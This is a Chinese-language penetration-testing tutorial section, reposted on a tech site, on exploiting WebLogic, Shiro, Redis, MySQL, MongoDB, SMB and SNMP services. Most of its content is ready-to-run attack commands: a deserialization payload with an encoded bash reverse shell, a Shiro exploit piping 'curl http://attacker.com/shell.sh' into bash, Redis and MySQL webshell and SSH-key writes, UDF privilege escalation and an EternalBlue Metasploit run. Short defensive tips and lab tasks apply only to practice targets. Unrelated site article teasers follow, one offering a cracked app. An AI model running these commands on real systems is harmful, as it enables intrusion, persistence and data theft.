服務攻防矩陣

4.1 中間件漏洞利用

WebLogic反序列化漏洞(CVE-2023-21839)
  • 漏洞原理

  • T3協議反序列化未嚴格校驗,攻擊者可注入惡意序列化對象執行任意代碼。

  • 攻擊流程

  1. 使用ysoserial生成CommonsCollections6 payload:

java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin 
  1. 通過T3協議發送payload:

python3 weblogic.py 192.168.1.100:7001 payload.bin 
  • 防御方案

  • 升級至官方補丁版本

  • 禁用T3協議或配置IP白名單

Shiro RememberMe反序列化(CVE-2016-4437)
  • 漏洞檢測

  • 檢查Cookie中rememberMe=deleteMe字段是否存在Shiro特征

  • 利用工具


python3 shiro_exploit.py -t http://target.com -p CommonsBeanutils1 -c "curl http://attacker.com/shell.sh | bash" 
  • 密鑰爆破

  • 使用shiro_attack.jar加載常見密鑰列表(如kPH+bIxk5D2deZiIxcaaaA==)

Redis未授權訪問
  • 寫SSH密鑰

config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3NzaC1yc2E...\n\n" save 
  • 寫WebShell

config set dir /var/www/html set shell "<?php @eval($_POST[cmd]);?>" config set dbfilename shell.php save 
  • 防御方案

  • 綁定127.0.0.1并設置強密碼

  • 禁用CONFIG/SAVE等高危命令

實踐任務
  • 使用Docker搭建Shiro 1.2.4靶場,利用默認密鑰反彈Shell

  • 通過Redis未授權訪問寫入計劃任務(/etc/crontab)實現持久化


4.2 數據庫滲透

MySQL提權技術
  • UDF提權(Linux)
  1. 上傳惡意so文件:

SELECT 0x7F454C46... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so' 
  1. 創建函數執行命令:

CREATE FUNCTION sys_exec RETURNS int SONAME 'udf.so'; SELECT sys_exec('chmod +s /bin/bash'); 
  • 日志文件寫入WebShell

SET global general_log_file='/var/www/html/shell.php'; SET global general_log=on; SELECT '<?php system($_GET["cmd"]);?>'; 
MongoDB注入與未授權訪問
  • NoSQL注入利用

// 原始查詢 db.users.find({user: "admin", pass: "123"}) // 攻擊載荷 db.users.find({user: "admin", pass: {"$ne": ""}}) 
  • 未授權訪問利用

mongo 192.168.1.100:27017 > db.adminCommand({listDatabases:1}) > db.getUser("admin") 
防御方案
  • 最小化權限:數據庫賬戶僅授予必要權限(禁止FILE_PRIV)

  • 網絡隔離:數據庫服務不暴露公網,限制訪問IP

實踐任務
  • 利用MySQL寫入WebShell獲取服務器權限

  • 通過MongoDB未授權訪問導出用戶數據


4.3 協議層漏洞

SMB永恒之藍(MS17-010)
  • Metasploit利用

msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.1.200 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > exploit 
  • 手工檢測

nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24 
SNMP弱口令與信息泄露
  • 社區名爆破

onesixtyone -c dict.txt 192.168.1.100 
  • 敏感信息提取

snmpwalk -v2c -c public 192.168.1.100 1.3.6.1.2.1.1.5.0 # 獲取主機名 snmpwalk -v2c -c private 192.168.1.100 1.3.6.1.2.1.25.4.2.1.2 # 進程列表 
防御方案
  • 禁用SMBv1

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 
  • SNMP加固

  • 修改默認community名稱

  • 配置ACL限制訪問源

實踐任務
  • 使用永恒之藍攻擊Windows 7靶機,獲取SYSTEM權限

  • 通過SNMP協議提取目標設備的ARP表


技術整合與防御體系

企業級服務加固清單
  1. 中間件層
  • 定期更新至穩定版本

  • 刪除默認管理頁面(如Tomcat的/manager/html)

  1. 數據庫層
  • 啟用SSL加密通信

  • 審計數據庫日志中的異常查詢

  1. 協議層
  • 關閉非必要協議(如Telnet/FTP)

  • 部署網絡IDS檢測異常SMB流量

紅隊攻擊鏈示例
  1. 通過Shiro反序列化獲取Web服務器權限

  2. 利用Redis未授權訪問橫向跳轉到數據庫服務器

  3. 通過MySQL提權建立SSH隧道進入內網


學習建議

  1. 靶場環境:搭建Vulhub、VulnApp等集成化漏洞環境

  2. 武器庫開發:編寫自動化服務探測腳本(如SMB掃描器)

  3. 攻防演練:參與HTB(Hack The Box)中服務類靶機挑戰

本部分內容將幫助學習者掌握企業級服務攻防核心技術,從單點漏洞利用進階到APT級橫向滲透,構建縱深防御體系。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/906659.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/906659.shtml
英文地址,請注明出處:http://en.pswp.cn/news/906659.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

PictureThis 解鎖高級會員版_v5.3.0 拍植物知名稱和植物百科

PictureThis 解鎖高級會員版_v5.3.0 拍植物知名稱和植物百科 PictureThis是一款創新的植物識別與園藝指導應用程序&#xff0c;旨在幫助用戶快速識別植物種類、了解植物信息&#xff0c;并提供專業的園藝養護建議…

大模型 Agent 就是文字藝術嗎?

最近在技術圈里有一個很有趣的爭論&#xff1a;大模型 Agent 是不是就是各種 Prompt 的堆疊&#xff1f;像 Manus 這樣看起來很智能的 Agent&#xff0c;本質上是不是就是用巧妙的 Prompt 約束大模型生成更好的輸出&#xff1f;換句話說&#xff0c;這是不是一門文字藝術&#…

LeetCode 1340. 跳躍游戲 V(困難)

題目描述 給你一個整數數組 arr 和一個整數 d 。每一步你可以從下標 i 跳到&#xff1a; i x &#xff0c;其中 i x < arr.length 且 0 < x < d 。i - x &#xff0c;其中 i - x > 0 且 0 < x < d 。 除此以外&#xff0c;你從下標 i 跳到下標 j 需要滿…

三相電壓的優勢,應用場景,功率測量

三相系統概述 我國三相系統&#xff0c;由頻率相同&#xff0c;幅度類似的三個交流電壓組成&#xff0c;每個電壓相差120度。 三相系統的優勢 啟動電機&#xff1a;三個矢量間隔的電壓&#xff0c;在電機中產生旋轉磁場&#xff0c;不需要額外繞組就可以啟動電機。 減少線損…

[原創](計算機數學)(The Probability Lifesaver)(P14): 推導計算 In(1-u) 約等于 -u

[作者] 常用網名: 豬頭三 出生日期: 1981.XX.XX 企鵝交流: 643439947 個人網站: 80x86匯編小站 編程生涯: 2001年~至今[共24年] 職業生涯: 22年 開發語言: C/C++、80x86ASM、Object Pascal、Objective-C、C#、R、Python、PHP、Perl、 開發工具: Visual Studio、Delphi、XCode、…

Android12 Rom定制去掉剪貼板復制成功的Toast

Android12Rom定制去掉剪貼板復制成功的Toast提示 1.前言&#xff1a; 最近在rom定制化開發時&#xff0c;測試提了一個bug&#xff0c;在瀏覽器或者文本里面使用剪貼板復制成功后會有一個Toast提示&#xff0c;這種體驗不是很好&#xff0c;因為每次復制成功都有一個提示&…

SOC-ESP32S3部分:9-GPIO輸入按鍵狀態讀取

飛書文檔https://x509p6c8to.feishu.cn/wiki/L6IGwHKV6ikQ08kqwAwcAvhznBc 前面我們學習了GPIO的輸出&#xff0c;GPIO輸入部分其實也是一樣的&#xff0c;這里我們使用按鍵作為GPIO輸入例程講解&#xff0c;分三步走。 查看板卡原理圖&#xff0c;確定使用的是哪個GPIO查看G…

高可用集群keepalived

1.不同操作系統的安裝 1.1 不同系統編譯安裝 ubuntu環境 apt-get - y install libssl-dev libpopt-dev daemon build-essential libssl-dev openssl libpopt-dev libsnmp-dev libnl-3-dev libnl-genl-3-dev centos環境 &#xff08;其他的下同&#xff09; yum install - y…

SpringCloud - 整合MQ實現消息總線服務

一、背景介紹 每當修改配置文件內容&#xff0c;如果需要客戶端也同步更新&#xff0c;就需要手動調用/refresh接口&#xff0c;以便客戶端能獲取到最新的配置內容。 當客戶端越來越多的時候&#xff0c;通過人工進行處理顯然非常雞肋。有沒有一種更加高效的辦法&#xff0c;…

測試W5500的第3步_使用ioLibrary庫創建TCPServer

W5500是一款具有8個Socket的網絡芯片&#xff0c;支持TCP Server模式&#xff0c;最多可同時連接8個客戶端。本文介紹了基于STM32F10x和W5500的TCP Server實現&#xff0c;包括SPI初始化、W5500復位、網絡參數配置、Socket狀態管理等功能&#xff0c;適用于需要多客戶端連接的嵌…

Web攻防-SQL注入數據庫類型用戶權限架構分層符號干擾利用過程發現思路

知識點&#xff1a; 1、Web攻防-SQL注入-產生原理&應用因素 2、Web攻防-SQL注入-各類數據庫類型利用 演示案例-WEB攻防-SQL注入-數據庫類型&架構分層&符號干擾 一、數據庫知識 1、數據庫名&#xff0c;表名&#xff0c;列名&#xff0c;數據 2、自帶數據庫&…

手機合集(不定期更新)

一、華為手機&#xff1a; 1.華為手機自助維修的方法&#xff1a; https://blog.csdn.net/humors221/article/details/145946128 2.華為手機實用功能介紹&#xff1a; https://blog.csdn.net/humors221/article/details/132514011 3.華為手機清理大數據的方法&#xff1a;…

移動安全Android——ROOT檢測繞過

工具準備 Magisk GitHub - topjohnwu/Magisk: The Magic Mask for Android ZygisckNext GitHub - Dr-TSNG/ZygiskNext at v1.2.8 Shamiko Releases LSPosed/LSPosed.github.io 安卓ROOT教程 Magisk 安裝教程 - Magisk 中文網 問題 大多數手機在ROOT狀態下會出現APP閃…

Python高效網絡爬蟲開發指南

Python 網絡爬蟲入門與實戰 一、引言 隨著互聯網數據的爆炸性增長&#xff0c;獲取和分析這些數據變得越來越重要。網絡爬蟲作為數據采集的重要工具&#xff0c;在這其中扮演了不可或缺的角色。 二、環境搭建 首先我們需要安裝Python環境以及一些必要的庫&#xff1a; req…

wireshark: Display Filter Reference

https://www.wireshark.org/docs/dfref/// 這個里面的擴展功能還是很強大&#xff0c;可以幫著問題分析。支持大量的自定義化的字段讀取功能&#xff0c;支持很多的協議。 https://www.wireshark.org/docs/dfref///f/frame.html frame.time_delta Time delta from previous ca…

dify創建銀行客服系統例子

傳統的銀行客服系統&#xff0c;通常以會話管理的方式實現&#xff0c;配置繁瑣復雜&#xff0c;固定且不靈活。如&#xff1a; 智能體的出現&#xff0c;為實現銀行客服系統提供了想象空間&#xff0c;可以集知識庫和業務流程為一體實現靈活可控的智能客服系統&#xff0c;即能…

前端函數防抖(Debounce)完整講解 - 從原理、應用到完整實現

&#x1f337; 古之立大事者&#xff0c;不惟有超世之才&#xff0c;亦必有堅忍不拔之志 &#x1f390; 個人CSND主頁——Micro麥可樂的博客 &#x1f425;《Docker實操教程》專欄以最新的Centos版本為基礎進行Docker實操教程&#xff0c;入門到實戰 &#x1f33a;《RabbitMQ》…

服務接口鑒權與內部認證:自定義注解與AOP實現的企業級實踐

本文深入解析企業級系統中接口安全管控的核心需求&#xff0c;提出基于Spring AOP與自定義注解的輕量級鑒權方案。通過解構注解元數據定義、切面攔截邏輯、上下文傳遞機制等關鍵技術環節&#xff0c;系統闡述零侵入式鑒權體系的構建路徑。結合金融支付網關、多租戶SaaS平臺、物…

26考研|高等代數:線性變換

前言 線性變換這一章節是考頻較高的一部分&#xff0c;此部分涉及考點較多&#xff0c;涉及的考題也較多&#xff0c;學習線性變換時&#xff0c;應該注意搭建線性變換與矩陣之間的聯系&#xff0c;掌握如何利用矩陣表示一個線性變換結構&#xff0c;同時介紹了最簡單的線性變…

電磁兼容(EMC)仿真(精編版)

寫在前面 本系列文章主要講解電磁兼容(EMC)仿真的相關知識,希望能幫助更多的同學認識和了解電磁兼容(EMC)仿真。 若有相關問題,歡迎評論溝通,共同進步。(*^▽^*) 隨著產品復雜性和密集度的提高以及設計周期的不斷縮短,在設計周期的后期解決電磁兼容性(EMC)問題變得…